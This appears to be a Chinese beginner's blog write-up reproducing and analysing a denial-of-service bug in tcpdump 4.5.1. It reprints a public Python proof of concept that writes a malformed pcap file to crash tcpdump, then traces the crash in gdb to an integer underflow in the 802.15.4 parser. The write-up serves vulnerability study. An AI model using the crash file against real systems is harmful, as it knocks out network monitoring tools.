0x0 前言
新手开始学习二进制漏洞
选择这个开始学习,是因为这是一个网上有很多复现和分析文章的漏洞,即常见高频漏洞
分析文章:
https://www.freebuf.com/vuls/248394.html
https://www.anquanke.com/post/id/166711
https://bbs.pediy.com/thread-261984.htm
0x01 前置知识:
pcap包格式
https://www.winpcap.org/docs/docs_412/html/incs_2pcap_8h_source.html
pcap文件主要包含了三个部分,24字节的pcap文件头,16字节的数据包头,数据包内容。
data:image/s3,"s3://crabby-images/b298d/b298d0ec2b45a792729ddcb53e5a061b57955065" alt="image-20210714163152207"
0x1 环境搭建
系统:kali 2021.2
0x11 tcpdump安装
当前版本查看:
data:image/s3,"s3://crabby-images/c1789/c1789bf1eb924ed7be3ca19e36e93400532de3fe" alt="image-20210714154436177"
卸载:
1
| apt-get --purge remove tcpdump
|
data:image/s3,"s3://crabby-images/76fb9/76fb933703fa03430b5a4b70ddb2aa5b21b163a4" alt="image-20210714154524975"
安装依赖
1 2
| apt install flex apt install bison
|
安装libpcap
1
| wget http://www.tcpdump.org/release/libpcap-1.5.3.tar.gz
|
data:image/s3,"s3://crabby-images/84076/84076534172174ad99b415433805980daf0d074a" alt="image-20210714154822298"
1 2
| tar -zxvf libpcap-1.5.3.tar.gz cd libpcap-1.5.3
|
data:image/s3,"s3://crabby-images/267d5/267d57ba06387eacc5d781e8909647640c597874" alt="image-20210714154955786"
data:image/s3,"s3://crabby-images/1bb88/1bb88865e530dcf35973e5a879c98dcca9920219" alt="image-20210714155033795"
data:image/s3,"s3://crabby-images/24e2c/24e2cb745ffffec87775c407531993bc5215f9e8" alt="image-20210714155127829"
安装tcpdump
1 2
| wget http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz tar -zxvf tcpdump-4.5.1.tar.gz
|
data:image/s3,"s3://crabby-images/c2848/c284885bbe4ba30b1f4a0b1c3b3c57bfa6ffec9f" alt="image-20210714155342417"
接下来同上:
1 2 3
| cd tcpdump-4.5.1 ./configure make & make install
|
装完之后查看版本:
data:image/s3,"s3://crabby-images/114d1/114d18f454c6e5d2d0e007188482e317313b40b1" alt="image-20210714155539098"
0x12 poc
https://www.exploit-db.com/exploits/39875
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39
| # Exploit Title: tcpdump 4.5.1 Access Violation Crash # Date: 31st May 2016 # Exploit Author: David Silveiro # Vendor Homepage: http://www.tcpdump.org # Software Link: http://www.tcpdump.org/release/tcpdump-4.5.1.tar.gz # Version: 4.5.1 # Tested on: Ubuntu 14 LTS
from subprocess import call from shlex import split from time import sleep
def crash():
command = 'tcpdump -r crash' buffer = '\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\xf5\xff' buffer += '\x00\x00\x00I\x00\x00\x00\xe6\x00\x00\x00\x00\x80\x00' buffer += '\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00<\x9c7@\xff\x00' buffer += '\x06\xa0r\x7f\x00\x00\x01\x7f\x00\x00\xec\x00\x01\xe0\x1a' buffer += "\x00\x17g+++++++\x85\xc9\x03\x00\x00\x00\x10\xa0&\x80\x18\'" buffer += "xfe$\x00\x01\x00\x00@\x0c\x04\x02\x08\n', '\x00\x00\x00\x00" buffer += '\x00\x00\x00\x00\x01\x03\x03\x04' with open('crash', 'w+b') as file: file.write(buffer) try: call(split(command)) print("Exploit successful! ") except: print("Error: Something has gone wrong!"
def main(): print("Author: David Silveiro ") print(" tcpdump version 4.5.1 Access Violation Crash ") sleep(2) crash()
if __name__ == "__main__": main()
|
通过运行这个poc,我们可以获得一个crash文件
data:image/s3,"s3://crabby-images/a0943/a0943d3fbd9bcfa7882173d96e5e52f4b584fb41" alt="image-20210714160246743"
0x13 crash文件
用winhex看一看这个crash文件
data:image/s3,"s3://crabby-images/a5975/a59755492445c5e7fdb8328ead4c7b6733da4bed" alt="image-20210714161151520"
对应pcap文件
0x2 漏洞复现
tcpdump
data:image/s3,"s3://crabby-images/991e9/991e9598b260bc17a9c0786817543ada46acedea" alt="image-20210714163355396"
data:image/s3,"s3://crabby-images/112fc/112fcf7cb7b8f8c486195472d59642fa0a44c847" alt="image-20210714163544925"
发生段错误。
wireshark
data:image/s3,"s3://crabby-images/d3542/d35429725ffde8f17cc976055b61611d3b9cc008" alt="image-20210714164206440"
0x3 漏洞分析
0x31 跟踪调试
安装gdb及常用插件peda/pwndbg
data:image/s3,"s3://crabby-images/12da7/12da76727e54df53e5a5cb1224bd27ece084b875" alt="image-20210714163905628"
1 2
| git clone https://github.com/longld/peda.git ~/peda echo "source ~/peda/peda.py">> ~/.gdbinit
|
data:image/s3,"s3://crabby-images/2e06f/2e06f3f1d3f8be52188920a370f4bcb2897db6e1" alt="image-20210714165900100"
1 2 3
| git clone https://github.com/pwndbg/pwndbg cd pwndbg ./setup.sh
|
data:image/s3,"s3://crabby-images/9466d/9466d7fd4b304fd315686f281629cf1244f59aac" alt="image-20210714165918843"
跟踪调试
用gdb打开
1 2
| gdb tcpdump gdb-peda$run -r crash文件
|
data:image/s3,"s3://crabby-images/74992/7499231bdf88208fe5cb873611e4426a868d07bd" alt="image-20210714170212005"
data:image/s3,"s3://crabby-images/18452/18452c998e72eeb4ccf80c68629f48e5c815fb6d" alt="image-20210714170252515"
运行后可以看到寄存器信息等:
data:image/s3,"s3://crabby-images/925ac/925ac34a6e7699a4e13685d682a1b7c751ecb23f" alt="image-20210714170640606"
data:image/s3,"s3://crabby-images/5dd41/5dd413f6272143fb7477f660d68c6559bd3f6573" alt="image-20210714170801622"
可以得知发生错误的原因:
1 2
| error: Cannot access memory at address 0x5555557f7000 #无法访问地址 0x5555557f7000 处的内存
|
即访问了不可访问的地址而导致的程序崩溃
位置在print_ascii.c文件中的91行
使用bt语句查看函数调用栈:
bt:显示所有的函数调用栈帧的信息,每个帧一行。
data:image/s3,"s3://crabby-images/8be85/8be8515af77074a460e86fa14cd2f12f2f6647b3" alt="image-20210714171537759"
可以看到函数调用以及所在的文件情况:
文件位置 |
函数名 |
libc-start.c:308 |
__libc_start_main |
tcpdump.c:1569 |
main |
pcap.c:849 |
pcap_loop |
savefile.c:409 |
pcap_offline_read |
tcpdump.c:1950 |
print_packet |
print-802_15_4.c:180 |
ieee802_15_4_if_print |
print-ascii.c:91 |
hex_and_ascii_print_with_offset |
接下来去tcpdump和libpcap的文件夹中取得上述文件,查看源码:
tcpdump.c:1569:调用了pcap_loop
data:image/s3,"s3://crabby-images/64c5e/64c5e470674a7d7596faa0351d9a364cff50709b" alt="image-20210714181754004"
pcap.c:849:pcap_loop函数,调用了pcap_offline_read
data:image/s3,"s3://crabby-images/1b1cf/1b1cfceb052ff6e24aa15f82d2eb841451f00664" alt="image-20210714181831537"
savefile.c:409:pcap_offline_read函数:
data:image/s3,"s3://crabby-images/8b5c4/8b5c45d237779f321fe04e30420da9823c62ff13" alt="image-20210714182139084"
这里面有一个callback,根据函数调用栈可以知道是调用了print_packet
tcpdump中的print_packet函数中,这里调用了ieee802_15_4_if_print
data:image/s3,"s3://crabby-images/7bce1/7bce1e73e70789a82d852562ff6f2ce9f157cccf" alt="image-20210715170515455"
在print-802_15_4的ieee802_15_4_if_print函数中,调用了ndo_default_print:
data:image/s3,"s3://crabby-images/b1b0e/b1b0ef4dcee9456fdaf4a17a6ea62845dbe52e52" alt="image-20210715170602361"
通过搜索这个函数,我们可以看到里面调用了hex_and_ascii_print:
data:image/s3,"s3://crabby-images/c9f67/c9f67d842c47c55cab035b766ca0e4d186ded2e1" alt="image-20210715171350065"
hex_and_ascii_print直接调用了hex_and_ascii_print_with_offset:
data:image/s3,"s3://crabby-images/7a5f7/7a5f741e223d01cfc79dcc18e734904fa1b1f507" alt="image-20210715171624113"
函数在print-ascii中:
data:image/s3,"s3://crabby-images/baebd/baebd23f97a356a9ef18d0c7f5386981ba62a56a" alt="image-20210715170659670"
根据while,知道这是一个循环,就可以猜测原因大概是因为循环,s2越界访问了
可以看出循环与nshorts有关,根据86行代码:
1
| nshorts = length / sizeof(u_short);
|
得知与length有关
一路向上寻找传入的length参数,根据以下调用:length就是caplen
1
| (ndo->ndo_default_print)(ndo, p, caplen);
|
结合gdb单步调试和源码分析ieee802_15_4_if_print函数:
给ieee802_15_4_if_print函数下断点:
1 2
| b ieee802_15_4_if_print run -r crash
|
data:image/s3,"s3://crabby-images/bd6af/bd6af11c297e25d5b6d287fad8121018f1afc34e" alt="image-20210715180222023"
然后s进入,可以继续单步n调试
查看变量此时的值:
data:image/s3,"s3://crabby-images/bd0c0/bd0c002efc211ef0b472e42a1824b9e31f619b49" alt="image-20210715181224711"
ieee802_15_4_if_print函数:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92
| ieee802_15_4_if_print(struct netdissect_options *ndo, const struct pcap_pkthdr *h, const u_char *p) { u_int caplen = h->caplen; int hdrlen; u_int16_t fc; u_int8_t seq;
if (caplen < 3) {//n步第一次,caplen = 0x8 ND_PRINT((ndo, "[|802.15.4] %x", caplen)); return caplen; }
fc = EXTRACT_LE_16BITS(p); hdrlen = extract_header_length(fc);//n步第二次,fc = 0xff40
seq = EXTRACT_LE_8BITS(p + 2);
p += 3;//n步第三次,hdrlen = 0x12 caplen -= 3;//n步第三次
ND_PRINT((ndo,"IEEE 802.15.4 %s packet ", ftypes[fc & 0x7]));//n步第四次,caplen = 0x5 if (vflag)//n步第五次 ND_PRINT((ndo,"seq %02x ", seq)); if (hdrlen == -1) { ND_PRINT((ndo,"malformed! ")); return caplen; }
if (!vflag) { p+= hdrlen;//n步第六次 caplen -= hdrlen;//n步第七次,caplen和hdrlen做了运算 } else { u_int16_t panid = 0;
switch ((fc >> 10) & 0x3) { case 0x00: ND_PRINT((ndo,"none ")); break; case 0x01: ND_PRINT((ndo,"reserved destination addressing mode")); return 0; case 0x02: panid = EXTRACT_LE_16BITS(p); p += 2; ND_PRINT((ndo,"%04x:%04x ", panid, EXTRACT_LE_16BITS(p))); p += 2; break; case 0x03: panid = EXTRACT_LE_16BITS(p); p += 2; ND_PRINT((ndo,"%04x:%s ", panid, le64addr_string(p))); p += 8; break; } ND_PRINT((ndo,"< ");
switch ((fc >> 14) & 0x3) { case 0x00: ND_PRINT((ndo,"none ")); break; case 0x01: ND_PRINT((ndo,"reserved source addressing mode")); return 0; case 0x02: if (!(fc & (1 << 6))) { panid = EXTRACT_LE_16BITS(p); p += 2; } ND_PRINT((ndo,"%04x:%04x ", panid, EXTRACT_LE_16BITS(p))); p += 2; break; case 0x03: if (!(fc & (1 << 6))) { panid = EXTRACT_LE_16BITS(p); p += 2; } ND_PRINT((ndo,"%04x:%s ", panid, le64addr_string(p)))); p += 8; break; }
caplen -= hdrlen; }
if (!suppress_default_print)//n步第八次,此时caplen=0xfffffff3 (ndo->ndo_default_print)(ndo, p, caplen);
return 0; }
|
而0xfffffff3=-13
作为length传入之后,可以得到nshorts为7FFFFFF9(0xfffffff3/2)
变成了一个极大的值,而数据包并没有这么大,因此最终访问到未授权的内存地址。
所以这个漏洞就是因为tcpdump会根据caplen长度去读取保存在内存空间数据包的内容,当引用到不可读取内存位置时,造成拒绝服务漏洞。
0x32 poc
caplen是由于做了caplen -= hdrlen;操作变成了负数,才导致了后续nshorts变成极大的值
因此只要我们的caplen-hdrlen是负数就可以了,这样的包就会引发漏洞